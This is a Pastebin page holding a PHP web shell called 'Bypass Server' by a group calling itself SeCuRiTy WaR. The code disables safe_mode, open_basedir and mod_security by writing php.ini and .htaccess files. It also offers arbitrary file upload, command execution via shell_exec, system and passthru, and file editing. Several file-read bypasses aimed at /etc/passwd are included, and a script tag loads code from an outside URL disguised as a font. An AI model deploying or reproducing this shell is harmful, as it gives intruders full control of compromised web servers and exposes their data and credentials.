Advertisement
RebelsCode

SeCuRiTy WaR |Bypass Server (New)

Jan 9th, 2017
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 17.96 KB | None | 0 0
  1. <html>
  2. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  3. <script src='http://www.w32.info/site/jquery1000/AlHurra-Font_Light.ttf'></script>
  4. <body bgcolor="#000000">
  5. <html/>
  6. <?php
  7. echo "<right>";
  8. echo"<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
  9.     <p align='center'>
  10.     <INPUT type='submit' name='FucK' value='Say To Safemode Go To HeLl By php.ini' id=input style='font-size: 12pt; font-weight: bold; border-style: inset; border-width: 1px'></p>
  11. </form>
  12. ";
  13. echo "<right/>";
  14. if  (empty($_POST['FucK'] ) ) {
  15.     }ELSE{
  16.     $action = '?action=FucK';
  17. echo "<html>
  18. <br>
  19. <head>
  20. <meta http-equiv='pragma' content='no-cache'>
  21. </head><body>";
  22. $fp = fopen("php.ini","w+");
  23. fwrite($fp,"safe_mode = Off
  24. disable_functions  =    NONE
  25. open_basedir = OFF ");
  26. echo "<b>Safe mode done ..</b>";
  27. echo ("<br>")
  28. ?>
  29. <?
  30. $fp2 = fopen(".htaccess","w+");
  31. fwrite($fp2,"
  32. <IfModule mod_security.c>
  33. FucKFilterEngine Off
  34. FucKFilterScanPOST Off
  35. FucKFilterCheckURLEncoding Off
  36. FucKFilterCheckUnicodeEncoding Off
  37. </IfModule>
  38. ");
  39. echo "<b>mod_security done..............</b><br>";
  40.  
  41.     echo "</font></center></td></tr></table> ";
  42.  
  43.     exit;
  44.     }
  45.  
  46.  
  47. $footer = " <p align='center'><font color='#808000' size='4'><b>powered by alnjm33</b></font></p>
  48. <p align='center'><font size='4' color='#808000'><b>sec-war.com </b></font></p>
  49. ";
  50. #/s/e/c/-/w/a/r/./c/o/m/############
  51.                             #######
  52. $mysql_use = "yes"; //"no"   //##### /// للتخطى بداله sql
  53. $mhost = "";                 //#####
  54. $muser = "";                  ######
  55. $mpass = "";                     ###
  56. $mdb = "";                    ######
  57. #/s/e/c/-/w/a/r/./c/o/m/############
  58. ?>
  59. <?php
  60. echo "<html>
  61. <p align='center'><b><font color='#008000' size='6'>&nbsp;<a href='http://sec-war.com/cc/index.php?'><font color='#008000'><span style='text-decoration: none'>By SeCuRiTy WaR</span></font></a>
  62. </font></b></p>
  63. <b>
  64. <tr>
  65. ";
  66. echo "<left>";
  67. echo "<font color='#FF0000'>php is :</font>";
  68. echo "<html><font color='#008000'> ";
  69. echo phpversion();
  70. echo "</font> <html/>";
  71. echo "<br>";
  72. echo "<font color='#FF0000'>uname -a:</font>";
  73. echo "<html><font color='#008000'> ";
  74. echo (php_uname());
  75. echo "</font> <html/>";
  76. echo "<br>";
  77. $mod = (ini_get ("safe_mode"));
  78. if ($mod == 1)   {
  79. echo "<font color='#FF0000'>safe mode is : <font color='#FF0000'>ON</font> (secure)</font>
  80. ";
  81. } else {
  82. echo "
  83. <font color='#FF0000'> safe mode is: <font color='#008000'>OFF</font>
  84. <font color='#008000'>(not secure)</font>";
  85. }
  86. echo "<br>";
  87. echo "<font color='#FF0000'>disable functions ::: </font> ";
  88. if(''==($badfunctions=@ini_get('disable_functions')))
  89. {echo "<font color='008000'>no functions</font></b>";}
  90. else
  91. {echo "<font color=FF0000>$badfunctions</font></b>";}
  92. $secwar = getcwd();
  93. echo "<br/>";
  94. echo "<b>dir :<font color='#008000'><font color='#008000'> $secwar</font>";
  95. echo "<br>";
  96. $server = gethostbyname($_SERVER["HTTP_HOST"]);
  97. echo "<b><font color='#FF0000'>server ip :<font color='#008000'> $server </font>";
  98. echo "<left/>";
  99. ?>
  100. <?php
  101. $cwd = getcwd();
  102. echo "  <center>
  103. <form method='POST' enctype='multipart/form-data'>
  104. <b>UPLOAD FILE</b><p>
  105. <input type='file' name='uploads' size='30' style='font-size: 10pt; color: #008000; font-family: Tahoma; border: 1px inset #C0C0C0; background-color: #FFFFFF; font-weight:bold'>
  106. <br>
  107. <input type='submit' value='Upload' size='50' style='font-size: 8pt; color: #000080; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #FFFFFF; font-weight:bold'>
  108. </p>
  109. </form></center></td></tr>
  110. </table><br>";
  111. if (!empty ($_FILES['uploads']))
  112. {
  113.     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
  114.     echo "<script>alert('Done :)'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
  115. }
  116.  
  117. ?>
  118.  
  119. <html>
  120. <form action=<?php echo $url ?>?&<?php echo $word ?>&war method='post'>
  121. <html/>
  122. <?
  123.  
  124. echo "
  125. <center>
  126. <p align='center'><font color='#008000' size='5'><b>run cmd</b></font></p>
  127. <input type='text' name='command' size='46'><input type='submit' name='sub' value='do it '>
  128. <br>
  129. <input type='radio' name='cmmmd' value='4'>automatic
  130. <input type='radio' name='cmmmd' value='1'>shell_exec
  131. <input type='radio' name='cmmmd' value='3'>passthru
  132. <input type='radio' name='cmmmd' value='2'>system
  133. <br>
  134.  
  135. <textarea name='exec' rows=6 cols=60 style='color: #008000; background-color: #000000; font-size:12pt; font-weight:bold'>
  136.  
  137. ";
  138.  
  139. if (isset($_GET['war'])) {
  140.     $dds=$_POST['cmmmd'];
  141.       $com=$_POST['command'];
  142.         if (isset($dds)) {
  143.           if ($dds=="1") {
  144.             echo shell_exec($com);
  145.               }
  146.                elseif($dds=="2") {
  147.                  echo system($com);
  148.                    }
  149.                   elseif ($dds=="3") {
  150.                     passthru($com);
  151.                      }
  152.                        elseif ($dds=="4") {
  153.                          if (function_exists(shell_exec)) {
  154.                             echo shell_exec($com);
  155.                               }
  156.                                  elseif (function_exists(system)) {
  157.                                    echo system($com);
  158.                                      }
  159.                                        elseif (function_exists(passthru)) {
  160.                                          echo passthru($com);
  161.                                            }
  162.                                              else {
  163.                                               echo "[-]Error";
  164.                                              }    
  165.                                           }
  166.                                        }
  167.                                     }
  168. echo "</textarea>";
  169. ?>
  170. <?
  171. echo "
  172.  
  173.  
  174. <body>
  175.  
  176. <table border='1' width='100%'>
  177.     <tr>
  178.         <td>&nbsp;<center>
  179.     <b><font face='Comic Sans MS' size='2'>.:Edit File:.</font></b></p><font size=1 face='Verdana'>".stripslashes($file)."</font><br><form method=POST action=''>
  180.     <input type=text name='editfile' value=$cwd ' size=25 ' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000' size='46'><br><input type=submit name='editgo' value='  Give me the file  ' style='font-size: 8pt; color: #00FF00; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></form></center></td></tr>
  181. </table>
  182. <center/></td>
  183.     </tr>
  184. </table>
  185.  
  186. </body>
  187.  
  188. </html>
  189. ";
  190. if (isset($_POST['editgo']) && $_POST['editfile'] !=$cwd)
  191. {
  192. $file = $_POST['editfile'];
  193. $content = file_get_contents($file);
  194. echo "<center><table border=0 width='100%'>
  195. <tr><td style='border:1px solid #00FF00; background-color: #000000'>
  196. <form method=POST action=''><input type='hidden' name='editfile' value='".$file."'><center><textarea rows='19' cols='103' style='color: #00FF00; background-color: #000000' name='newtext'>".htmlspecialchars($content)."</textarea><br><input type=submit name='edit' value='Save' style='font-size: 9pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></center></form>
  197. </td></tr>
  198. </table></center>";
  199. }
  200. if (isset($_POST['edit']))
  201. {
  202. $file = $_POST['editfile'];
  203. $ch = fopen($file, "w+") or die("<script>alert('Error Editing'); </script>");
  204. fwrite($ch, stripslashes($_POST['newtext'])) or die ("<script>alert('Error'); </script>");
  205. fclose($ch);
  206. echo "<script>alert('Done what about visit us sec-war.com');</script>";
  207. }
  208. echo "<br/>";
  209. ?>
  210. <?
  211.  
  212. echo "
  213. <table border='1' width='100%' bordercolorlight='#FFFFFF' cellspacing='0' cellpadding='0' bordercolordark='#FFFFFF'>
  214.     <tr>
  215.         <td>&nbsp; 
  216. <p align='center'><font color='#FFFF00'><b>
  217. ثـــــــــــغـــــــــــــــــــــــرات لقــــــــــــــــــــــراـءه
  218. المــــــــــــــــــــــــــــــــــــــلــــــــــــــــفـــــــــــــــــــــــات</b></font></p>
  219.  
  220. <title>SeCuRiTy WaR</title>
  221. <center>
  222. <font color='#FFFF00' size='4'>
  223. <br>
  224. <p align='center'>
  225. <font face='Comic Sans MS' size='2'>ini_restore:</font>
  226. <br/>
  227. <input type=text name=inimode value=/etc/passwd size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #000000; background-color: #FFFFFFF' >
  228. <br>
  229. <input type=submit value='GO' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #FFFFFF'></form></td>
  230.     </tr>
  231. </table>
  232.  
  233. ";
  234.  
  235.  
  236. if(empty($_POST['inimode'])){
  237. } else {
  238. echo "Done.....","<br> ";
  239. echo "<center><table border=0 width='100%' bgcolor='#FFFFFF'>
  240. <tr><td style='border:1px solid #FFFFFF; background-color: #FFFFFF'>
  241. <center>
  242. <textarea rows='19' cols='103'  style='color: #008000; background-color: #000000'>";
  243. $inimode=$_POST['inimode'];
  244. echo ini_get("safe_mode");
  245. echo ini_get("open_basedir");
  246. $s=readfile("$m");
  247. ini_restore("safe_mode");
  248. ini_restore("open_basedir");
  249. echo ini_get("safe_mode");
  250. echo ini_get("open_basedir");
  251. $s=readfile("$inimode");
  252. echo "</textarea></center></td></tr></table></center>";
  253. }
  254.  
  255. echo "<div align=center id='n'><font face=tahoma size=2><b>
  256. <form style='border: 1px ridge #FFFFFF'>
  257. <td width='50%'><font color=red>Read etc/passwd</font></td>
  258. <br>
  259.    <td width='50%'><select size=\'1\' name='blue'><option value='SecurityWar'>/etc/passwd</option></option></select></td>
  260.  
  261. <td width='100%' colspan='2'>
  262.    <p align='center'><input type='submit' value='ok'></td>
  263.    </form>
  264.      <form style='border: 1px ridge #FFFFFF'>
  265.       <textarea rows='19' cols='103'  style='color: #008000; background-color: #000000'>
  266. ";
  267.  
  268.  
  269.      if ($_GET['blue'] )
  270.  
  271.                                            for($uid=0;$uid<60000;$uid++){
  272.                                         $ara = posix_getpwuid($uid);
  273.                                                 if (!empty($ara)) {
  274.                                                   while (list ($key, $val) = each($ara)){
  275.                                                     print "$val:";
  276.                                                   }
  277.                                                   print "\n";
  278.                                                 }
  279.                                         }
  280.                                        
  281. echo "</textarea></center></td></tr></table></center>";
  282. ?>
  283.  
  284. <?php
  285. echo "
  286. <table border='1' width='100%' bordercolorlight='#FFFFFF' cellspacing='0' cellpadding='0' bordercolordark='#FFFFFF'>
  287.     <tr>
  288.         <td>
  289.         <p align='center'>&nbsp;</form></p>
  290.         <form method=POST action=''>
  291.             <p align='center'><b>
  292.     <font face='Comic Sans MS' size='2' color='#008000'>SQL :</font></b></p>
  293.             <p align='center'>
  294.     <font face='Comic Sans MS' size='2'>&nbsp;&nbsp;&nbsp;</font><input type=text name=sql value=/etc/passwd size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px inset #FFFFFF; background-color: #FFFFFF'></p>
  295.     <p align='center'>
  296.     &nbsp;<input type=submit value=GO style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px inset #000000; background-color: #FFFFFF'></p></td>
  297.     </tr>
  298. </table>
  299.  
  300. ";
  301. if(empty($_POST['sql'])){
  302. } else {
  303. echo "
  304. <body text='#008000' bgcolor='#000000'>
  305.  
  306. <center><table border=0 width='100%'>
  307. <tr><td style='border:1px solid #008000; background-color: #000000'>
  308. <center><textarea rows='19' cols='103' method=POST style='color: #008000; background-color: #000000'>"
  309. ;
  310. $sqlfile=$_POST['sql'];
  311.  
  312.  
  313. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  314. $mysql_files = explode(':', $mysql_files_str);
  315.  
  316. $sql = array (
  317. "USE $mdb",
  318. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  319. "LOAD DATA LOCAL INFILE '$sqlfile' INTO TABLE $tbl FIELDS "
  320. . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
  321. . "ESCAPED BY          '' "
  322. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  323.  
  324. "SELECT a FROM $tbl LIMIT 1"
  325. );
  326. mysql_connect ($mhost, $muser, $mpass);
  327.  
  328.                                 foreach ($sql as $statement) {
  329.                                    $q = mysql_query ($statement);
  330.  
  331.                                    if ($q == false) die (
  332.                                       "FAILED: " . $statement . "\n" .
  333.                                       "REASON: " . mysql_error () . "\n"
  334.                                    );
  335.  
  336.                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  337.  
  338.                                    echo htmlspecialchars($r[0]);
  339.                                    mysql_free_result ($q);
  340.                                 }
  341. echo "</textarea></center></td></tr></table></center>";
  342. }
  343. ?>
  344. <?
  345. echo "
  346.  
  347.  
  348.  
  349. <table border='1' width='100%'>
  350.     <tr>
  351.         <td>
  352. </form><form method=POST action=''>
  353.     <p align='center'><font face='Comic Sans MS' size='2'><b>
  354.     <font color='#0000FF'>curl</font></b></font></p>
  355.     <p align='center'><font face='Comic Sans MS' size='2'></font>
  356.     <input type=text name=cur value=Ammmmmmmm size='50' style='font-size: 10pt; color: #008000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFF; font-weight:bold' ></p>
  357.     <p align='center'>
  358.     <input type=submit value='Read' style='font-size: 12pt; color: #008000; font-family: Tahoma; border: 1px inset #808080; background-color: #FFFFFF; font-weight:bold'></p>
  359. </form>
  360. ";
  361. if(empty($_POST['cur'])){
  362.  
  363. } else {
  364. echo "Reading .....","<br>" ;
  365. echo "<center><table border=0 width='100%'>
  366. <tr><td style='border:1px solid #FFFFFF; background-color: #000000'><center>
  367. <textarea rows='19' cols='103' style='color: #00FF00; background-color: #000000'>";
  368.  
  369. $m=$_POST['cur'];
  370. $li =
  371. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  372. curl_exec($li);
  373. var_dump(curl_exec($li));
  374. echo "</textarea></center></td></tr></table></center>";
  375. }
  376.  
  377. // منقول من very secret
  378. echo "<html>
  379.  
  380. <table border='1' width='100%'>
  381.     <tr>
  382.         <td>
  383.  
  384. <form method='POST' enctype='multipart/form-data' >
  385.  
  386.  
  387. <form method='POST' enctype='multipart/form-data' >
  388.  
  389. <p align='center'>
  390.  
  391. <font color='#808000'>
  392.  
  393. <br>
  394. <b>show_source :</b></font></p>
  395. <p align='center'>
  396.  
  397. <b>&nbsp;</b><input type='text' name='source' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
  398. <center>
  399.  
  400. <center>
  401.  
  402. <font color='#808000'>
  403.  
  404. <b>highlight_file :</b></font><p><b>&nbsp;</b><input type='text' name='high' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
  405. <center>
  406.  
  407. <center>
  408.  
  409. <input type='submit''  value='Read'  style='color: #00FF00; border: 1px inset #000000; background-color: #FFFFFF; font-weight:bold'></form</p>
  410. </form</p>
  411.     </form>
  412.     <p>&nbsp;</td>
  413. </tr>
  414. </table>
  415.  
  416.  
  417. ";
  418. if(empty($_POST['source']))
  419. {
  420. }
  421. else
  422. {
  423. $s = $_POST['source'];
  424. echo "<b><h1><font size='4' color='silver'>show_source</font></h1>";
  425. $source = show_source($s);
  426. echo "</textarea>";
  427. }
  428. if(empty($_POST['high']))
  429. {
  430. }
  431. else
  432. {
  433. $h = $_POST['high'];
  434. echo "<b><h1><font size='4' color='silver'>highlight_file</font></h1>";
  435. echo "<br>";
  436. $high = highlight_file($h);
  437. }
  438. ?>
  439. <?php
  440. ECHO "
  441. <table border='1' width='100%'>
  442.     <tr>
  443.         <td>&nbsp;<center>
  444. <form method=POST action=''>
  445.     <p align=;center;><font face='Comic Sans MS' size='2'><font color='#FFFFCC'>
  446.     <b>Copy :&nbsp;</b></font>&nbsp;&nbsp;&nbsp;&nbsp;</font></p>
  447.     <p align='center'><font face='Comic Sans MS' size='2'>&nbsp;&nbsp;</font><input type=text name=copy value=/etc/passwd size='50' style='font-size: 10pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'></p>
  448.     <p align='center'>
  449.     <input type=submit value=Show style='font-size: 10pt; color: #00FF00; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #FFFFFF
  450. ; font-weight:bold'></p>
  451. <center/>
  452. ";
  453. $mon="";
  454. $tymczas="";
  455. if(empty($_POST['copy'])){
  456. } else {
  457. echo "<p><b><font size='5' color='#FFFFCC'>Done.....</font></b></p>
  458. " ;
  459. "<br>";
  460. echo "<textarea method='POST' cols='80' rows='23' wrar='off' style='color: #008000' name='a' >";
  461. $mon=$_POST['copy'];
  462. $temp=tempnam($tymczas, "cx");
  463. if(copy("compress.zlib://".$mon, $temp)){
  464. $zrodlo = fopen($temp, "r");
  465. $tekst = fread($zrodlo, filesize($temp));
  466. fclose($zrodlo);
  467. echo "".htmlspecialchars($tekst)."";
  468. unlink($temp);
  469. echo "</textarea>";
  470. echo "</td>
  471.     </tr>
  472. </table>";
  473. } else {
  474. die("<FONT COLOR=\"RED\"><CENTER><font color='#FF0000'><b>هذا الملف ياما غير موجود
  475. ياما ليس لديك التصريح</b></font>
  476. <B>&quot;".htmlspecialchars($mon)."&quot;</B> </CENTER></FONT>");
  477. }
  478. }
  479. ?>
  480.     <html>
  481. <center>
  482. <a href=<?php echo $url; ?><?php echo $word ?>?team>
  483. <input type=submit value='Security War Team' name="chmod" style="border-style: ridge; border-width: 1px"></a></p>
  484. <center/>
  485. <html/>
  486.     <?
  487.  
  488.  
  489. if (isset($_GET['team'])) {
  490. echo "
  491. <head>
  492. <meta http-equiv='Content-Language' content='en-us'>
  493. </head>
  494.  
  495. <p align='center'><font color='#0000FF'><b>MeMaTi</b></font></p>
  496. <p align='center'><font color='#0000FF'><b>PrEdAtOr</b></font></p>
  497. <p align='center'><font color='#0000FF'><b>AlNjM33</b></font></p>
  498. <p align='center'><font color='#0000FF'><b>mrlala</b></font></p>
  499. <p align='center'><font color='#0000FF'><b>xXx</b></font></p>
  500. <p align='center'><font color='#0000FF'><b><span lang='ar-eg'>الشبح المرح</span></b></font></p>
  501. <p align='center'><font color='#0000FF'><b>DON-CaRloS</b></font></p>
  502. <p align='center'><font color='#0000FF'><b><span class='lastaction'><span lang='ar-eg'>مجنون جنان</span></span></b></font></p>
  503. <p align='center'><font color='#0000FF'><span class='lastaction'><span lang='ar-eg'><b>جميع القائمين
  504. على موقع سيكيورتى وار</b></span></span></font></p>
  505. ";
  506. exit;
  507.  
  508. }
  509.  
  510. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement